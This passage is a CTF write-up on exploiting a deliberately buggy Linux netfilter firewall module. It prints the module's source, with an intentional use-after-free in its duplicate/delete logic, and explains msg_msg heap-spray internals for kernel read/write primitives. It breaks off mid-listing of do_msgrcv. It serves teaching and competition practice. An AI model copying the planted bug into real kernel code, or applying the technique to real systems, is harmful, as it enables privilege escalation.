/ CTF, RESEARCH

[corCTF 2021] Wall Of Perdition: Utilizing msg_msg Objects For Arbitrary Read And Arbitrary Write In The Linux Kernel

Wall of Perdition is the second and harder part of a two part series of kernel exploitation challenges designed by FizzBuzz101 and me for corCTF 2021. You can find the writeup for the first part, Fire of Salvation, on his blog. Unfortunately, both challenges during competition remained unsolved. Wall of Perdition consists in a vulnerable Linux Kernel Module, the bug is a 0x30 bytes Use After Free Write in kmalloc-64. With this challenge, we present an innovative approach to transform the Linux kernel’s IPC mechanism, more specifically, message operations, in a powerful exploitation toolkit. Let’s jump in!

Overview

For this challenge, we decided to write a kernel firewall, based on NetFilter, controllable from user space via ioctl(). An user can add rules, edit rules, delete rules and duplicate rules (from inbound list to outbound list and vice versa).

We used the FGKASLR branch of the Linux kernel. Function Granular Kernel Address Space Layout Randomization, increases the level of protection offered by KASLR: while KASLR moves the entire kernel code text at a “random location” at boot time, FGKASLR rearranges the kernel code at load time on a per-function level granularity. This makes code reuse attacks very difficult to accomplish, as now knowing the kernel base address (due to a memory leak for example) is no longer a sufficient condition to calculate the address of an arbitrary function.

Supervisor Mode Execution Prevention (SMEP) and Supervisor Mode Access Prevention (SMAP) are enabled, so it is neither possible to execute code in user space from kernel space, nor access data in higher CPU rings without using specific functions like copy_from_user() / copy_to_user() which turn off the SMAP flag of the CR4 register before accessing data in user space.

As additional protections, we set CONFIG_STATIC_USERMODEHELPER to true, forcing all usermode helper calls through a single binary, then we set CONFIG_STATIC_USERMODEHELPER_PATH to an empty sting. This way it is impossible to overwrite targets like modprobe_path, core_pattern and so on, to make the kernel execute an arbitrary binary.

Finally, we decided to use the SLAB allocator instead of SLUB to avoid any attempt of freelist poisoning, an attack that we will discuss in a future article. _ freelist randomization was also enabled.

You can find the challenge, with the complete kernel configuration, here: Wall of Perdition

A Buggy Linux Kernel Firewall

We decided to release the firewall source code, so players could focus directly on the exploitation phase without having to reverse engineer the module first. Here is the source code:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
#include <linux/kernel.h>
#include <linux/module.h>
#include <linux/device.h>
#include <linux/mutex.h>
#include <linux/fs.h>
#include <linux/slab.h>
#include <linux/miscdevice.h>
#include <linux/uaccess.h>
#include <linux/random.h>
#include <crypto/hash.h>
#include <linux/types.h>
#include <linux/netfilter.h>
#include <linux/netfilter_ipv4.h>
#include <linux/net.h>
#include <linux/in.h>
#include <linux/skbuff.h>
#include <linux/ip.h>
#include <linux/inet.h>
#include <linux/tcp.h>
#include <linux/udp.h>


MODULE_AUTHOR("FizzBuzz and D3v17");
#ifdef EASY_MODE
MODULE_DESCRIPTION("Fire of Salvation");
#endif
#ifndef EASY_MODE
MODULE_DESCRIPTION("Wall of Perdition");
#endif
MODULE_LICENSE("GPL");


#define DEVICE_NAME "firewall"
#define CLASS_NAME  "firewall"

#define ADD_RULE 0x1337babe
#define DELETE_RULE 0xdeadbabe
#define EDIT_RULE 0x1337beef
#define SHOW_RULE 0xdeadbeef
#define DUP_RULE 0xbaad5aad

#define ERROR -1
#define SUCCESS 0
#define MAX_RULES 0x80

#define INBOUND 0
#define OUTBOUND 1
#define SKIP -1

#ifdef EASY_MODE
#define DESC_MAX 0x800
#endif


typedef struct
{
    char iface[16];
    char name[16];
    char ip[16];
    char netmask[16];
    uint8_t idx;
    uint8_t type;
    uint16_t proto;
    uint16_t port;
    uint8_t action;
    #ifdef EASY_MODE
    char desc[DESC_MAX];
    #endif
} user_rule_t;

typedef struct
{
    char iface[16];
    char name[16];
    uint32_t ip;
    uint32_t netmask;
    uint16_t proto;
    uint16_t port;
    uint8_t action;
    uint8_t is_duplicated;
    #ifdef EASY_MODE
    char desc[DESC_MAX];
    #endif
} rule_t;

rule_t **firewall_rules_in;
rule_t **firewall_rules_out;

static DEFINE_MUTEX(firewall_lock);

static long firewall_ioctl(struct file *file, unsigned int cmd, unsigned long arg);
static uint32_t firewall_inbound_hook(void *priv, struct sk_buff *skb, const struct nf_hook_state *state);
static uint32_t firewall_outbound_hook(void *priv, struct sk_buff *skb, const struct nf_hook_state *state);
static uint32_t process_rule(struct sk_buff *skb, rule_t *rule, uint8_t type, int i);
static long firewall_add_rule(user_rule_t user_rule, rule_t **firewall_rules, uint8_t idx);
static long firewall_delete_rule(user_rule_t user_rule, rule_t **firewall_rules, uint8_t idx);
static long firewall_edit_rule(user_rule_t user_rule, rule_t **firewall_rules, uint8_t idx);
static long firewall_show_rule(user_rule_t user_rule, rule_t **firewall_rules, uint8_t idx);
static long firewall_dup_rule(user_rule_t user_rule, rule_t **firewall_rules, uint8_t idx);

static struct miscdevice firewall_device;
static struct file_operations firewall_fops = {.unlocked_ioctl = firewall_ioctl};

static struct nf_hook_ops in_hook = {
  .hook        = firewall_inbound_hook,
  .hooknum     = NF_INET_PRE_ROUTING,
  .pf          = PF_INET,
  .priority    = NF_IP_PRI_FIRST
};

static struct nf_hook_ops out_hook = {
  .hook        = firewall_outbound_hook,
  .hooknum     = NF_INET_POST_ROUTING,
  .pf          = PF_INET,
  .priority    = NF_IP_PRI_FIRST
};


static long firewall_ioctl(struct file *file, unsigned int cmd, unsigned long arg)
{
    int ret;
    user_rule_t user_rule;
    rule_t **firewall_rules;

    mutex_lock(&firewall_lock);
    memset(&user_rule, 0, sizeof(user_rule_t));

    if (copy_from_user((void *)&user_rule, (void *)arg, sizeof(user_rule_t)))
    {
        printk(KERN_INFO "[Firewall::Error] firewall_ioctl() cannot copy user request!\n");
        mutex_unlock(&firewall_lock);
        return ERROR;
    }

    if (user_rule.idx >= MAX_RULES)
    {
        printk(KERN_INFO "[Firewall::Info] firewall_ioctl() invalid index!\n");
        mutex_unlock(&firewall_lock);
        return ERROR;
    }

    if ((user_rule.type != INBOUND) && (user_rule.type != OUTBOUND))
    {
        printk(KERN_INFO "[Firewall::Error] firewall_ioctl() invalid rule type!\n");
        mutex_unlock(&firewall_lock);
        return ERROR;
    }

    firewall_rules = (user_rule.type == INBOUND) ? firewall_rules_in : firewall_rules_out;

    switch (cmd)
    {
        case ADD_RULE:
            ret = firewall_add_rule(user_rule, firewall_rules, user_rule.idx);
            break;

        case DELETE_RULE:
            ret = firewall_delete_rule(user_rule, firewall_rules, user_rule.idx);
            break;

        case SHOW_RULE:
            ret = firewall_show_rule(user_rule, firewall_rules, user_rule.idx);
            break;

        case EDIT_RULE:
            ret = firewall_edit_rule(user_rule, firewall_rules, user_rule.idx);
            break;

        case DUP_RULE:
            ret = firewall_dup_rule(user_rule, firewall_rules, user_rule.idx);
            break;

        default:
            ret = ERROR;
            break;
    }

    mutex_unlock(&firewall_lock);

    return ret;
}


static long firewall_add_rule(user_rule_t user_rule, rule_t **firewall_rules, uint8_t idx)
{
    printk(KERN_INFO "[Firewall::Info] firewall_add_rule() adding new rule!\n");

    if (firewall_rules[idx] != NULL)
    {
        printk(KERN_INFO "[Firewall::Error] firewall_add_rule() invalid rule slot!\n");
        return ERROR;
    }

    firewall_rules[idx] = (rule_t *)kzalloc(sizeof(rule_t), GFP_KERNEL);

    if (!firewall_rules[idx])
    {
        printk(KERN_INFO "[Firewall::Error] firewall_add_rule() allocation error!\n");
        return ERROR;
    }

    memcpy(firewall_rules[idx]->iface, user_rule.iface, 16);
    memcpy(firewall_rules[idx]->name, user_rule.name, 16);

    #ifdef EASY_MODE
    strncpy(firewall_rules[idx]->desc, user_rule.desc, DESC_MAX);
    #endif

    if (in4_pton(user_rule.ip, strnlen(user_rule.ip, 16), (u8 *)&(firewall_rules[idx]->ip), -1, NULL) == 0)
    {
        printk(KERN_ERR "[Firewall::Error] firewall_add_rule() invalid IP format!\n");
        kfree(firewall_rules[idx]);
        firewall_rules[idx] = NULL;
        return ERROR;
    }

    if (in4_pton(user_rule.netmask, strnlen(user_rule.netmask, 16), (u8 *)&(firewall_rules[idx]->netmask), -1, NULL) == 0)
    {
        printk(KERN_ERR "[Firewall::Error] firewall_add_rule() invalid Netmask format!\n");
        kfree(firewall_rules[idx]);
        firewall_rules[idx] = NULL;
        return ERROR;
    }

    firewall_rules[idx]->proto = user_rule.proto;
    firewall_rules[idx]->port = ntohs(user_rule.port);
    firewall_rules[idx]->action = user_rule.action;
    firewall_rules[idx]->is_duplicated = 0;

    printk(KERN_ERR "[Firewall::Info] firewall_add_rule() new rule added!\n");

    return SUCCESS;
}


static long firewall_delete_rule(user_rule_t user_rule, rule_t **firewall_rules, uint8_t idx)
{
    printk(KERN_INFO "[Firewall::Info] firewall_delete_rule() deleting rule!\n");

    if (firewall_rules[idx] == NULL)
    {
        printk(KERN_INFO "[Firewall::Error] firewall_delete_rule() invalid rule slot!\n");
        return ERROR;
    }

    kfree(firewall_rules[idx]); // [3]
    firewall_rules[idx] = NULL;

    return SUCCESS;
}


static long firewall_edit_rule(user_rule_t user_rule, rule_t **firewall_rules, uint8_t idx)
{
    printk(KERN_INFO "[Firewall::Info] firewall_edit_rule() editing rule!\n");

    #ifdef EASY_MODE
    printk(KERN_INFO "[Firewall::Error] Note that description editing is not implemented.\n");
    #endif

    if (firewall_rules[idx] == NULL)
    {
        printk(KERN_INFO "[Firewall::Error] firewall_edit_rule() invalid idx!\n");
        return ERROR;
    }

    memcpy(firewall_rules[idx]->iface, user_rule.iface, 16);
    memcpy(firewall_rules[idx]->name, user_rule.name, 16);

    if (in4_pton(user_rule.ip, strnlen(user_rule.ip, 16), (u8 *)&(firewall_rules[idx]->ip), -1, NULL) == 0)
    {
        printk(KERN_ERR "[Firewall::Error] firewall_edit_rule() invalid IP format!\n");
        return ERROR;
    }

    if (in4_pton(user_rule.netmask, strnlen(user_rule.netmask, 16), (u8 *)&(firewall_rules[idx]->netmask), -1, NULL) == 0)
    {
        printk(KERN_ERR "[Firewall::Error] firewall_edit_rule() invalid Netmask format!\n");
        return ERROR;
    }

    firewall_rules[idx]->proto = user_rule.proto;
    firewall_rules[idx]->port = ntohs(user_rule.port);
    firewall_rules[idx]->action = user_rule.action;

    printk(KERN_ERR "[Firewall::Info] firewall_edit_rule() rule edited!\n");

    return SUCCESS;
}


static long firewall_show_rule(user_rule_t user_rule, rule_t **firewall_rules, uint8_t idx)
{
    printk(KERN_INFO "[Firewall::Error] Function not implemented.\n");
    return ERROR;
}


static long firewall_dup_rule(user_rule_t user_rule, rule_t **firewall_rules, uint8_t idx)
{
    uint8_t i;
    rule_t **dup;

    printk(KERN_INFO "[Firewall::Info] firewall_dup_rule() duplicating rule!\n");

    dup = (user_rule.type == INBOUND) ? firewall_rules_out : firewall_rules_in;

    if (firewall_rules[idx] == NULL)
    {
        printk(KERN_INFO "[Firewall::Error] firewall_dup_rule() nothing to duplicate!\n");
        return ERROR;
    }

    if (firewall_rules[idx]->is_duplicated)
    {
        printk(KERN_INFO "[Firewall::Info] firewall_dup_rule() rule already duplicated before!\n");
        return ERROR;
    }

    for (i = 0; i < MAX_RULES; i++)
    {
        if (dup[i] == NULL)
        {
            dup[i] = firewall_rules[idx];
            firewall_rules[idx]->is_duplicated = 1;
            printk(KERN_INFO "[Firewall::Info] firewall_dup_rule() rule duplicated!\n");
            return SUCCESS;
        }
    }

    printk(KERN_INFO "[Firewall::Error] firewall_dup_rule() nowhere to duplicate!\n");

    return ERROR;
}


static uint32_t process_rule(struct sk_buff *skb, rule_t *rule, uint8_t type, int i)
{
    struct iphdr *iph;
    struct tcphdr *tcph;
    struct udphdr *udph;

    printk(KERN_INFO "[Firewall::Info] rule->iface: %s...\n", rule->iface);
    printk(KERN_INFO "[Firewall::Info] skb->dev->name: %s...\n", skb->dev->name);

    if (strncmp(rule->iface, skb->dev->name, 16) != 0)
    {
        printk(KERN_INFO "[Firewall::Error] Rule[%d], inferface doesn't match, skipping!\n", i);
        return SKIP;
    }

    iph = ip_hdr(skb);

    if (type == INBOUND)
    {
        if ((rule->ip & rule->netmask) != (iph->saddr & rule->netmask))
        {
            printk(KERN_INFO "[Firewall::Error] Rule[%d], ip->saddr doesn't belong to the provided subnet, skipping!\n", i);
            return SKIP;
        }
    }
    else
    {
        if ((rule->ip & rule->netmask) != (iph->daddr & rule->netmask))
        {
            printk(KERN_INFO "[Firewall::Error] Rule[%d], ip->daddr doesn't belong to the provided subnet, skipping!\n", i);
            return SKIP;
        }
    }

    if ((rule->proto == IPPROTO_TCP) && (iph->protocol == IPPROTO_TCP))
    {
        printk(KERN_INFO "[Firewall::Info] Rule[%d], protocol is TCP\n", i);

        tcph = tcp_hdr(skb);

        if ((rule->port != 0) && (rule->port != tcph->dest))
        {
            printk(KERN_INFO "[Firewall::Error] Rule[%d], rule->port (%d) != tcph->dest (%d), skipping!\n", i, ntohs(rule->port), ntohs(tcph->dest));
            return SKIP;
        }

        if ((rule->action != NF_DROP) && (rule->action != NF_ACCEPT))
        {
            printk(KERN_INFO "[Firewall::Error] Rule[%d], invalid action (%d), skipping!\n", i, rule->action);
            return SKIP;
        }

        printk(KERN_INFO "[Firewall::Info] %s Rule[%d], action %d\n", (type == INBOUND) ? "Inbound" : "Outbound", i, rule->action);

        return rule->action;
    }

    else if ((rule->proto == IPPROTO_UDP) && (iph->protocol == IPPROTO_UDP))
    {
        printk(KERN_INFO "[Firewall::Info] Rule[%d], protocol is UDP\n", i);

        udph = udp_hdr(skb);

        if ((rule->port != 0) && (rule->port != udph->dest))
        {
            printk(KERN_INFO "[Firewall::Error] Rule[%d], rule->port (%d) != udph->dest (%d), skipping!\n", i, ntohs(rule->port), ntohs(udph->dest));
            return SKIP;
        }

        if ((rule->action != NF_DROP) && (rule->action != NF_ACCEPT))
        {
            printk(KERN_INFO "[Firewall::Error] Rule[%d], invalid action (%d), skipping!\n", i, rule->action);
            return SKIP;
        }

        printk(KERN_INFO "[Firewall::Info] %s Rule[%d], action %d\n", (type == INBOUND) ? "Inbound" : "Outbound", i, rule->action);

        return rule->action;
    }

    return SKIP;
}


static uint32_t firewall_inbound_hook(void *priv, struct sk_buff *skb, const struct nf_hook_state *state)
{
    int i;
    uint32_t ret;

    for (i = 0; i < MAX_RULES; i++)
    {
        if (firewall_rules_in[i])
        {
            ret = process_rule(skb, firewall_rules_in[i], INBOUND, i);

            if (ret != SKIP)
                return ret;
        }
    }

    return NF_ACCEPT;
}


static uint32_t firewall_outbound_hook(void *priv, struct sk_buff *skb, const struct nf_hook_state *state)
{
    int i;
    uint32_t ret;

    for (i = 0; i < MAX_RULES; i++)
    {
        if (firewall_rules_out[i])
        {
            ret = process_rule(skb, firewall_rules_out[i], OUTBOUND, i);

            if (ret != SKIP)
                return ret;
        }
    }

    return NF_ACCEPT;
}


static int init_firewall(void)
{
    mutex_init(&firewall_lock);

    firewall_device.minor = MISC_DYNAMIC_MINOR;
    firewall_device.name = DEVICE_NAME;
    firewall_device.fops = &firewall_fops;

    if (misc_register(&firewall_device))
    {
        printk(KERN_INFO "[Firewall::Error] Device registration failed!\n");
        return ERROR;
    }

    printk(KERN_INFO "[Firewall::Init] Initializing firewall...\n");

    firewall_rules_in = kzalloc(sizeof(void *) * MAX_RULES, GFP_KERNEL);
    firewall_rules_out = kzalloc(sizeof(void *) * MAX_RULES, GFP_KERNEL);

    if (nf_register_net_hook(&init_net, &in_hook) < 0)
    {
        printk(KERN_INFO "[Firewall::Error] Cannot register nf hook!\n");
        return ERROR;
    }

    if (nf_register_net_hook(&init_net, &out_hook) < 0)
    {
        printk(KERN_INFO "[Firewall::Error] Cannot register nf hook!\n");
        return ERROR;
    }

    printk(KERN_INFO "[Firewall::Init] Firewall initialized!\n");
    #ifdef EASY_MODE
    printk(KERN_INFO "[Firewall::Init] 👼 Welcome to Easy Mode 👼\n");
    #else
    printk(KERN_INFO "[Firewall::Init] 😈 Welcome to Hard Mode 😈\n");
    #endif
    return SUCCESS;
}


static void cleanup_firewall(void)
{
    int i;

    printk(KERN_INFO "[Firewall::Exit] Cleaning up...\n");

    for (i = 0; i < MAX_RULES; i++)
    {
        if (firewall_rules_in[i] != NULL)
        {
            kfree(firewall_rules_in[i]);
        }

        if (firewall_rules_out[i] != NULL)
        {
            kfree(firewall_rules_out[i]);
        }
    }

    memset(firewall_rules_in, 0, sizeof(void *) * MAX_RULES);
    memset(firewall_rules_out, 0, sizeof(void *) * MAX_RULES);

    kfree(firewall_rules_in);
    firewall_rules_in = NULL;

    kfree(firewall_rules_out);
    firewall_rules_out = NULL;

    nf_unregister_net_hook(&init_net, &in_hook);
    nf_unregister_net_hook(&init_net, &out_hook);

    misc_deregister(&firewall_device);
    mutex_destroy(&firewall_lock);

    printk(KERN_INFO "[Firewall::Exit] Cleanup done, bye!\n");
}


module_init(init_firewall);
module_exit(cleanup_firewall);

As we mentioned in the introduction, an user can interact with the firewall using ioctl(). There are five exposed functions, add_rule() (line 184), delete rule() (line 236), edit rule() (line 253), show_rule() (line 292) and duplicate_rule() (line 299). As we can see from source code, show_rule(), despite being exposed, is not implemented.

The firewall is based on NetFilter and it is using two NetFilter hooks, a prerouting hook to filter incoming packets (line 104) and a postrouting hook to filter outgoing packets (line 111). For this reason in the source code there are two lists of pointers to rules, firewall_rules_in (line 86) and firewall_rules_out. (line 87) Each one of these lists can contain up to 128 pointers to rules.

debug

The request format to interact with the firewall is defined by the type user_rule_t (line 69). IP address and Netmask are received by the kernel in character buffers and are subsequently converted to integers in kernel space as we can see in add_rule() (line 209, 217) and edit_rule() (line 270, 276). Other required fields include interface name, rule name, rule index, port, type (0 for inbound or 1 for outbound), protocol, and the action to be taken when there is a match in process_rule().

Once IP and Netmask have been converted to integers, the user request is transferred in a new structure handled by the kernel, defined by the type rule_t (line 84). This structure will be allocated in kmalloc-64, since its size is 0x30 bytes.

Because of the exploitation phase being relatively complex, we decide to make the bug really easy to spot. duplicate_rule() allows users to duplicate rules from the list firewall_rules_in to the list firewall_rules_out and vice versa. The problem arises if we decide to duplicate a rule and then free it using delete_rule(). At line 246 delete_rule() will use kfree() to free the pointer to the rule and then will set it to NULL, but the same pointer will still be accessible in the other list! This can lead to a 0x30 bytes Use After Free Write in kmalloc-64 using edit_rule() to modify the freed, but still accessible rule.

A Dive Into Linux Kernel’s IPC

To exploit the UAF in kmalloc-64, we are going abuse the Linux kernel’s IPC mechanism, more specifically message operations, for this reason we need to take a quick dive into some of its features.

The kernel offers two syscalls to perform Inter Process Communication using messages, msgsnd() and msgrcv(), respectively used to send messages to, and receive messages from a message queue. A message in kernel space is composed by two parts, a message header, described by the structure msg_msg and message data, following immediately afterwards. Here is the msg_msg structure:

struct msg_msg {
	struct list_head m_list;
	long m_type;
	size_t m_ts;		/* message text size */
	struct msg_msgseg *next;
	void *security;
	/* the actual message follows immediately */
};

This elastic object is extensively used by kernel exploit developers to perform heap spray, since the size of the message is controllable by the user and therefore it can be allocated in multiple caches, starting from kmalloc-64 up to kmalloc-4096.

Every time we use msgsnd() to send a message, the kernel calls do_msgsnd(), which calls load_msg(), which in turn calls alloc_msg() to allocate the required objects in the appropriate slab to contain message header and message data. Afterwards the message content is copied from user space to kernel space using copy_from_user() in load_msg().

For example, let’s say we want to send a message consisting in 0x1fc8 ‘A’s: we first create a message queue using msgget() then we send the actual message using msgsnd():

[...]

struct msgbuf
{
    long mtype;
    char mtext[0x1fc8];
} msg;

msg.mtype = 1;
memset(msg.mtext, 'A', sizeof(msg.mtext));

qid = msgget(IPC_PRIVATE, 0666 | IPC_CREAT));
msgsnd(qid, &msg, sizeof(msg.mtext), 0);

[...]

Now let’s examine the source code of alloc_msg() and load_msg() to understand what happens in kernel space:

static struct msg_msg *alloc_msg(size_t len)
{
	struct msg_msg *msg;
	struct msg_msgseg **pseg;
	size_t alen;

	alen = min(len, DATALEN_MSG); // [1]
	msg = kmalloc(sizeof(*msg) + alen, GFP_KERNEL_ACCOUNT); // [2]
	if (msg == NULL)
		return NULL;

	msg->next = NULL;
	msg->security = NULL;

	len -= alen; // [3]
	pseg = &msg->next;
	while (len > 0) {
		struct msg_msgseg *seg;

		cond_resched();

		alen = min(len, DATALEN_SEG); // [4]
		seg = kmalloc(sizeof(*seg) + alen, GFP_KERNEL_ACCOUNT); // [5]
		if (seg == NULL)
			goto out_err;
		*pseg = seg; // [6]
		seg->next = NULL;
		pseg = &seg->next;
		len -= alen;
	}

	return msg;

out_err:
	free_msg(msg);
	return NULL;
}

As we can see in the source code above, in alloc_msg(), the kernel calculates alen = min(len, DATALEN_MSG); [1], where len is the message size provided by the user, 0x1fc8 in our case, and DATALEN_MSG corresponds to ((size_t)PAGE_SIZE - sizeof(struct msg_msg)). Since by default PAGE_SIZE is equal to 0x1000 bytes, and sizeof(struct msg_msg) is equal to 0x30 bytes, DATALEN_MSG corresponds to 0xfd0 bytes, and that line, in our case, will result in alen = min(0x1fc8, 0xfd0) = 0xfd0.

At the next line, the kernel allocates the message using msg = kmalloc(sizeof(*msg) + alen, GFP_KERNEL_ACCOUNT); [2]. Here sizeof(*msg) is equal to 0x30 bytes (it is nothing more than msg_msg) and alen, as we discussed above, is equal to 0xfd0. So that line, in our case, will be equal to msg = kmalloc(0x1000, GFP_KERNEL_ACCOUNT);. This message will be allocated in kmalloc-4096.

After a couple of lines, len, the message size provided by the user, is decremented by alen [3], then the kernel starts allocating the required segments, connected in a singly linked list, until len > 0. The size of a segment is determined by alen = min(len, DATALEN_SEG); [4]. Since len has just been decremented by alen, it now corresponds to len = len - alen = 0x1fc8 - 0xfd0 = 0xff8. DATALEN_SEG is defined as ((size_t)PAGE_SIZE - sizeof(struct msg_msgseg)) and since sizeof(struct msg_msgseg) is equal to 0x8 bytes, DATALEN_SEG corresponds to 0xff8 bytes. So that line will result in alen = min(0xff8, 0xff8) = 0xff8;.

At the next line, the segment is allocated using seg = kmalloc(sizeof(*seg) + alen, GFP_KERNEL_ACCOUNT); [5]. Since sizeof(*seg) is equal to 0x8 bytes and alen now is 0xff8, that line will be equal to seg = kmalloc(0x1000, GFP_KERNEL_ACCOUNT);. Even this segment, will be allocated in kmalloc-4096.

Finally the pointer to the segment is saved in the message header [6], and the function can return the pointer to the message. Now load_msg() is ready to copy the message content from user space to kernel space:

struct msg_msg *load_msg(const void __user *src, size_t len)
{
	struct msg_msg *msg;
	struct msg_msgseg *seg;
	int err = -EFAULT;
	size_t alen;

	msg = alloc_msg(len); // [1]
	if (msg == NULL)
		return ERR_PTR(-ENOMEM);

	alen = min(len, DATALEN_MSG);
	if (copy_from_user(msg + 1, src, alen)) // [2]
		goto out_err;

	for (seg = msg->next; seg != NULL; seg = seg->next) {
		len -= alen;
		src = (char __user *)src + alen;
		alen = min(len, DATALEN_SEG);
		if (copy_from_user(seg + 1, src, alen)) // [3]
			goto out_err;
	}

	err = security_msg_msg_alloc(msg);
	if (err)
		goto out_err;

	return msg;

out_err:
	free_msg(msg);
	return ERR_PTR(err);
}

As we can see from the load_msg() source code, after allocating the message using alloc_msg() [1], it starts copying the message data from user space to the allocated memory region in kernel space, based on the size of alen [2] using copy_from_user(). Then it starts copying the remaining parts of the message into the various segments [3]. In our case it will copy the first 0xfd0 bytes of our data in the first message, and the rest, 0xff8 bytes, in the segment. Of course in our case, we only have a single segment, so its pointer to the next segment, is NULL.

Here is our message in kernel memory:

debug

And here is the corresponding segment:

debug

Now let’s see what happens when we use msgrcv() to receive the message:

void *memdump = malloc(0x1fc8);
msgrcv(qid, memdump, 0x1fc8, 1, IPC_NOWAIT | MSG_NOERROR);

First, the kernel calls do_msgrcv(), setting its sixth argument, the msg_handler() function pointer, to do_msg_fill() as we can see in ksys_msgrcv():

long ksys_msgrcv(int msqid, struct msgbuf __user *msgp, size_t msgsz,
		 long msgtyp, int msgflg)
{
	return do_msgrcv(msqid, msgp, msgsz, msgtyp, msgflg, do_msg_fill);
}

Later on, do_msg_fill() will be used to copy the message from kernel space to user space. Here is the source code of do_msgrcv():

static long do_msgrcv(int msqid, void __user *buf, size_t bufsz, long msgtyp, int msgflg,
	       long (*msg_handler)(void __user *, struct msg_msg *, size_t))
{
	int mode;
	struct msg_queue *msq;
	struct ipc_namespace *ns;
	struct msg_msg *msg, *copy = NULL;
	DEFINE_WAKE_Q(wake_q);

	ns = current->nsproxy->ipc_ns;

	if (msqid < 0 || (long) bufsz < 0)
		return -EINVAL;

	if (msgflg & MSG_COPY) {
		if ((msgflg & MSG_EXCEPT) || !(msgflg & IPC_NOWAIT))
			return -EINVAL;
		copy = prepare_copy(buf, min_t(size_t, bufsz, ns->msg_ctlmax)); // [4]
		if (IS_ERR(copy))
			return PTR_ERR(copy);
	}
	mode = convert_mode(&msgtyp, msgflg);

	rcu_read_lock();
	msq = msq_obtain_object_check(ns, msqid);
	if (IS_ERR(msq)) {
		rcu_read_unlock();
		free_copy(copy);
		return PTR_ERR(msq);
	}

	for (;;) {
		struct msg_receiver msr_d;

		msg = ERR_PTR(-EACCES);
		if (ipcperms(ns, &msq->q_perm, S_IRUGO))
			goto out_unlock1;

		ipc_lock_object(&msq->q_perm);

		/* raced with RMID? */
		if (!ipc_valid_object(&msq->q_perm)) {
			msg = ERR_PTR(-EIDRM);
			goto out_unlock0;
		}

		msg = find_msg(msq, &msgtyp, mode); // [1]
		if (!IS_ERR(msg)) {
			/*
			 * Found a suitable message.
			 * Unlink it from the queue.
			 */
			if ((bufsz < msg->m_ts) && !(msgflg & MSG_NOERROR)) {
				msg = ERR_PTR(-E2BIG);
				goto out_unlock0;
			}
			/*
			 * If we are copying, then do not unlink message and do
			 * not update queue parameters.
			 */
			if (msgflg & MSG_COPY) {
				msg = copy_msg(msg, copy); // [5]
				goto out_unlock0;
			}

			list_del(&msg->m_list);
			msq->q_qnum--;
			msq->q_rtime = ktime_get_real_seconds();
			ipc_update_pid(&msq->q_lrpid, task_tgid(current));
			msq->q_cbytes -= msg->m_ts;
			atomic_sub(msg->m_ts, &ns->msg_bytes);
			atomic_dec(&ns->msg_hdrs);
			ss_wakeup(msq, &wake_q, false);

			goto out_unlock0;
		}

		/* No message waiting. Wait for a message */
		if (msgflg & IPC_NOWAIT) {
			msg = ERR_PTR(-ENOMSG);
			goto out_unlock0;
		}

		list_add_tail(&msr_d.r_list, &msq->q_receivers);
		msr_d.r_tsk = current;
		msr_d.r_msgtype = msgtyp;
		msr_d.r_mode = mode;
		if (msgflg & MSG_NOERROR)
			msr_d.r_maxsize = INT_MAX;
		else
			msr_d.r_maxsize = bufsz;

		/* memory barrier not require due to ipc_lock_object() */
		WRITE_ONCE(msr_d.r_msg, ERR_PTR(-EAGAIN));

		/* memory barrier not required, we own ipc_lock_object() */
		__set_current_state(TASK_INTERRUPTIBLE);

		ipc_unlock_object(&msq->q_perm);
		rcu_read_unlock();
		schedule();

		/*
		 * Lockless receive, part 1:
		 * We don't hold a reference to the queue and getting a
		 * reference would defeat the idea of a lockless operation,
		 * thus the code relies on rcu to guarantee the existence of
		 * msq:
		 * Prior to destruction, expunge_all(-EIRDM) changes r_msg.
		 * Thus if r_msg is -EAGAIN, then the queue not yet destroyed.
		 */
		rcu_read_lock();

		/*
		 * Lockless receive, part 2:
		 * The work in pipelined_send() and expunge_all():
		 * - Set pointer to message
		 * - Queue the receiver task for later wakeup
		 * - Wake up the process after the lock is dropped.
		 *
		 * Should the process wake up before this wakeup (due to a
		 * signal) it will either see the message and continue ...
		 */
		msg = READ_ONCE(msr_d.r_msg);
		if (msg != ERR_PTR(-EAGAIN)) {
			/* see MSG_BARRIER for purpose/pairing */
			smp_acquire__after_ctrl_dep();

			goto out_unlock1;
		}

		 /*
		  * ... or see -EAGAIN, acquire the lock to check the message
		  * again.
		  */
		ipc_lock_object(&msq->q_perm);

		msg = READ_ONCE(msr_d.r_msg);
		if (msg != ERR_PTR(-EAGAIN))
			goto out_unlock0;

		list_del(&msr_d.r_list);
		if (signal_pending(current)) {
